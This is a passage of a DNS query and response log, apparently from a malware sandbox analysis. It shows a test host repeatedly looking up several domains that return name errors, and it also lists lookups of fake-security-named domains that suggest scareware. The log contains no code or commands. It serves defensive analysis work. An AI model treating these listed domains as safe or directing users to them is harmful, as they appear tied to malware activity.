                                                                                                                                                Sep 29, 2022 14:52:50.715879917 CEST192.168.2.58.8.8.80x3c0dStandard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:50.760176897 CEST192.168.2.58.8.8.80xd5d3Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:51.010474920 CEST192.168.2.58.8.8.80xf0b0Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:51.174238920 CEST192.168.2.58.8.8.80x17b1Standard query (0)www.vikingwebscanner.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:52.379141092 CEST192.168.2.58.8.8.80xcb36Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:52.453211069 CEST192.168.2.58.8.8.80x5fcStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:52.798526049 CEST192.168.2.58.8.8.80xb119Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:02.543740988 CEST192.168.2.58.8.8.80x770fStandard query (0)yandex.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:02.564934015 CEST192.168.2.58.8.8.80x6e52Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:05.625869036 CEST192.168.2.58.8.8.80xa07fStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:06.861321926 CEST192.168.2.58.8.8.80xa859Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:09.979070902 CEST192.168.2.58.8.8.80x3a73Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:13.294076920 CEST192.168.2.58.8.8.80x8b6eStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:15.435511112 CEST192.168.2.58.8.8.80xdfb3Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:16.266920090 CEST192.168.2.58.8.8.80x352Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:16.819966078 CEST192.168.2.58.8.8.80xa748Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:21.900283098 CEST192.168.2.58.8.8.80xe50Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:22.014240980 CEST192.168.2.58.8.8.80x8703Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:22.656955004 CEST192.168.2.58.8.8.80x673dStandard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:23.653224945 CEST192.168.2.58.8.8.80x9994Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:24.035444021 CEST192.168.2.58.8.8.80x3279Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:25.094780922 CEST192.168.2.58.8.8.80x2ba9Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:32.179270983 CEST192.168.2.58.8.8.80x7a15Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:33.502031088 CEST192.168.2.58.8.8.80x42d0Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:34.385406971 CEST192.168.2.58.8.8.80xf5fbStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:34.776547909 CEST192.168.2.58.8.8.80x8f46Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:36.227304935 CEST192.168.2.58.8.8.80x6e32Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:37.212419033 CEST192.168.2.58.8.8.80x5264Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:41.944253922 CEST192.168.2.58.8.8.80xb02bStandard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:42.027642965 CEST192.168.2.58.8.8.80x4204Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:42.718497992 CEST192.168.2.58.8.8.80x7738Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:43.524508953 CEST192.168.2.58.8.8.80x7946Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:45.715130091 CEST192.168.2.58.8.8.80x64a0Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:45.766916990 CEST192.168.2.58.8.8.80x40caStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:47.661619902 CEST192.168.2.58.8.8.80xeedStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:48.141120911 CEST192.168.2.58.8.8.80x7416Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:48.460314989 CEST192.168.2.58.8.8.80xecb3Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:49.385174036 CEST192.168.2.58.8.8.80x2b36Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:50.559000969 CEST192.168.2.58.8.8.80x8fb8Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:51.658906937 CEST192.168.2.58.8.8.80xbee3Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:52.201858044 CEST192.168.2.58.8.8.80x22daStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:58.275578976 CEST192.168.2.58.8.8.80xf5e5Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:02.567691088 CEST192.168.2.58.8.8.80xd9edStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:06.708353996 CEST192.168.2.58.8.8.80x1b27Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:07.033514977 CEST192.168.2.58.8.8.80x3d90Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:07.685686111 CEST192.168.2.58.8.8.80xd1dbStandard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:09.698196888 CEST192.168.2.58.8.8.80xfab0Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:11.615170002 CEST192.168.2.58.8.8.80x36eaStandard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:11.712768078 CEST192.168.2.58.8.8.80x6b9Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:13.148771048 CEST192.168.2.58.8.8.80x3c5cStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:13.606512070 CEST192.168.2.58.8.8.80x30cStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:14.466114998 CEST192.168.2.58.8.8.80xc091Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:14.573435068 CEST192.168.2.58.8.8.80xfab3Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:16.654772043 CEST192.168.2.58.8.8.80x5Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:17.326693058 CEST192.168.2.58.8.8.80x88a8Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:17.374245882 CEST192.168.2.58.8.8.80xa9b9Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:17.456191063 CEST192.168.2.58.8.8.80x9d3fStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:18.201627016 CEST192.168.2.58.8.8.80x44b3Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:19.136936903 CEST192.168.2.58.8.8.80xcefcStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:19.568471909 CEST192.168.2.58.8.8.80xc6dfStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:20.626136065 CEST192.168.2.58.8.8.80xb11aStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:21.809619904 CEST192.168.2.58.8.8.80x862aStandard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:22.520863056 CEST192.168.2.58.8.8.80x6394Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:23.638346910 CEST192.168.2.58.8.8.80x44a1Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:25.256217957 CEST192.168.2.58.8.8.80xa34aStandard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:25.458868980 CEST192.168.2.58.8.8.80x923bStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:25.706504107 CEST192.168.2.58.8.8.80x43adStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:26.242085934 CEST192.168.2.58.8.8.80xbf80Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:28.221396923 CEST192.168.2.58.8.8.80x5d5dStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:28.860622883 CEST192.168.2.58.8.8.80x8388Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:29.222599983 CEST192.168.2.58.8.8.80xf222Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:29.316111088 CEST192.168.2.58.8.8.80xa51cStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:29.443041086 CEST192.168.2.58.8.8.80x9bb3Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:29.911521912 CEST192.168.2.58.8.8.80x8795Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:30.456382036 CEST192.168.2.58.8.8.80x5cd7Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:31.710412979 CEST192.168.2.58.8.8.80x6460Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:32.323118925 CEST192.168.2.58.8.8.80xba40Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:32.428657055 CEST192.168.2.58.8.8.80x3912Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:32.830472946 CEST192.168.2.58.8.8.80xd75eStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:33.813723087 CEST192.168.2.58.8.8.80x11b5Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:36.566817045 CEST192.168.2.58.8.8.80x8637Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:36.629336119 CEST192.168.2.58.8.8.80x59c8Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:37.201318026 CEST192.168.2.58.8.8.80x4bd3Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:38.573740005 CEST192.168.2.58.8.8.80xdb2Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:40.676804066 CEST192.168.2.58.8.8.80xe037Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:41.021246910 CEST192.168.2.58.8.8.80xab15Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:42.568625927 CEST192.168.2.58.8.8.80x98d7Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:42.672970057 CEST192.168.2.58.8.8.80x6dc0Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:44.859672070 CEST192.168.2.58.8.8.80xe941Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:46.160206079 CEST192.168.2.58.8.8.80x3310Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:46.324119091 CEST192.168.2.58.8.8.80x7181Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:46.398181915 CEST192.168.2.58.8.8.80xf02eStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:48.883299112 CEST192.168.2.58.8.8.80xe0cdStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:49.393167973 CEST192.168.2.58.8.8.80x4d3bStandard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:54.196567059 CEST192.168.2.58.8.8.80x3971Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:54.769850016 CEST192.168.2.58.8.8.80x48f2Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:55.326944113 CEST192.168.2.58.8.8.80x32ffStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:55:01.008116007 CEST192.168.2.58.8.8.80xc43aStandard query (0)www5.internet-security-guard.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:55:01.008577108 CEST192.168.2.58.8.8.80xd222Standard query (0)secure1.safe-scanerwas.comA (IP address)IN (0x0001)false
                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                Sep 29, 2022 14:51:11.934063911 CEST8.8.8.8192.168.2.50x6329No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:51:12.808355093 CEST8.8.8.8192.168.2.50x871dNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:51:12.808355093 CEST8.8.8.8192.168.2.50x871dNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:51:12.808355093 CEST8.8.8.8192.168.2.50x871dNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:51:12.808355093 CEST8.8.8.8192.168.2.50x871dNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:38.312371969 CEST8.8.8.8192.168.2.50x5642Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:39.776227951 CEST8.8.8.8192.168.2.50x9f09No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:40.704476118 CEST8.8.8.8192.168.2.50xea37No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:40.704476118 CEST8.8.8.8192.168.2.50xea37No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:40.704476118 CEST8.8.8.8192.168.2.50xea37No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:40.704476118 CEST8.8.8.8192.168.2.50xea37No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:40.771085024 CEST8.8.8.8192.168.2.50x51deNo error (0)searchdusty.com37.187.79.168A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:41.893821955 CEST8.8.8.8192.168.2.50x2413Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:41.969563007 CEST8.8.8.8192.168.2.50x346Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:42.218388081 CEST8.8.8.8192.168.2.50xc1c5Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:43.236991882 CEST8.8.8.8192.168.2.50xaf75Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:43.273978949 CEST8.8.8.8192.168.2.50x7160Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:43.605315924 CEST8.8.8.8192.168.2.50x59ffName error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:46.083432913 CEST8.8.8.8192.168.2.50xcb06Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:47.876560926 CEST8.8.8.8192.168.2.50xf236Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:49.191962957 CEST8.8.8.8192.168.2.50x45a4Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:50.735460997 CEST8.8.8.8192.168.2.50x3c0dName error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:50.777403116 CEST8.8.8.8192.168.2.50xd5d3Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:51.029110909 CEST8.8.8.8192.168.2.50xf0b0Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:51.200172901 CEST8.8.8.8192.168.2.50x17b1No error (0)www.vikingwebscanner.com185.53.177.53A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:52.400228024 CEST8.8.8.8192.168.2.50xcb36Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:52.472470999 CEST8.8.8.8192.168.2.50x5fcName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:52.819032907 CEST8.8.8.8192.168.2.50xb119Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:02.562397957 CEST8.8.8.8192.168.2.50x770fNo error (0)yandex.ru77.88.55.50A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:02.562397957 CEST8.8.8.8192.168.2.50x770fNo error (0)yandex.ru5.255.255.80A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:02.562397957 CEST8.8.8.8192.168.2.50x770fNo error (0)yandex.ru5.255.255.88A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:02.562397957 CEST8.8.8.8192.168.2.50x770fNo error (0)yandex.ru77.88.55.55A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:02.584041119 CEST8.8.8.8192.168.2.50x6e52No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:05.653626919 CEST8.8.8.8192.168.2.50xa07fNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:06.886605024 CEST8.8.8.8192.168.2.50xa859No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:10.004312038 CEST8.8.8.8192.168.2.50x3a73No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:13.311578035 CEST8.8.8.8192.168.2.50x8b6eNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:15.454936981 CEST8.8.8.8192.168.2.50xdfb3No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:16.294327021 CEST8.8.8.8192.168.2.50x352No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:16.847264051 CEST8.8.8.8192.168.2.50xa748No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:21.917300940 CEST8.8.8.8192.168.2.50xe50Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:22.033421993 CEST8.8.8.8192.168.2.50x8703Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:22.679127932 CEST8.8.8.8192.168.2.50x673dName error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:23.672688007 CEST8.8.8.8192.168.2.50x9994No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:24.057836056 CEST8.8.8.8192.168.2.50x3279No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:25.122189999 CEST8.8.8.8192.168.2.50x2ba9No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:32.199131012 CEST8.8.8.8192.168.2.50x7a15Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:33.519670010 CEST8.8.8.8192.168.2.50x42d0No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:34.404980898 CEST8.8.8.8192.168.2.50xf5fbNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:34.796040058 CEST8.8.8.8192.168.2.50x8f46Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:36.244798899 CEST8.8.8.8192.168.2.50x6e32No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:37.231940985 CEST8.8.8.8192.168.2.50x5264Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:41.961935997 CEST8.8.8.8192.168.2.50xb02bName error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:42.046997070 CEST8.8.8.8192.168.2.50x4204Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:42.736170053 CEST8.8.8.8192.168.2.50x7738Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:43.543986082 CEST8.8.8.8192.168.2.50x7946No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:45.732291937 CEST8.8.8.8192.168.2.50x64a0Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:45.786371946 CEST8.8.8.8192.168.2.50x40caName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:47.679128885 CEST8.8.8.8192.168.2.50xeedNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:48.158612013 CEST8.8.8.8192.168.2.50x7416Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:48.477603912 CEST8.8.8.8192.168.2.50xecb3No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:49.404613972 CEST8.8.8.8192.168.2.50x2b36No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:50.576625109 CEST8.8.8.8192.168.2.50x8fb8No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:51.678134918 CEST8.8.8.8192.168.2.50xbee3No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:52.221050978 CEST8.8.8.8192.168.2.50x22daNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:53:58.295209885 CEST8.8.8.8192.168.2.50xf5e5No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:02.587142944 CEST8.8.8.8192.168.2.50xd9edNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:06.737238884 CEST8.8.8.8192.168.2.50x1b27Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:07.053148985 CEST8.8.8.8192.168.2.50x3d90Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:07.702836037 CEST8.8.8.8192.168.2.50xd1dbName error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:09.715924978 CEST8.8.8.8192.168.2.50xfab0No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:11.634366989 CEST8.8.8.8192.168.2.50x36eaName error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:11.729490042 CEST8.8.8.8192.168.2.50x6b9Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:13.168360949 CEST8.8.8.8192.168.2.50x3c5cNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:13.629451990 CEST8.8.8.8192.168.2.50x30cNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:14.485532999 CEST8.8.8.8192.168.2.50xc091No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:14.593544960 CEST8.8.8.8192.168.2.50xfab3Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:16.673954010 CEST8.8.8.8192.168.2.50x5No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:17.344607115 CEST8.8.8.8192.168.2.50x88a8Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:17.393457890 CEST8.8.8.8192.168.2.50xa9b9No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:17.478008986 CEST8.8.8.8192.168.2.50x9d3fName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:18.219084978 CEST8.8.8.8192.168.2.50x44b3No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:19.156436920 CEST8.8.8.8192.168.2.50xcefcNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:19.591833115 CEST8.8.8.8192.168.2.50xc6dfNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:20.648185968 CEST8.8.8.8192.168.2.50xb11aNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:21.831628084 CEST8.8.8.8192.168.2.50x862aName error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
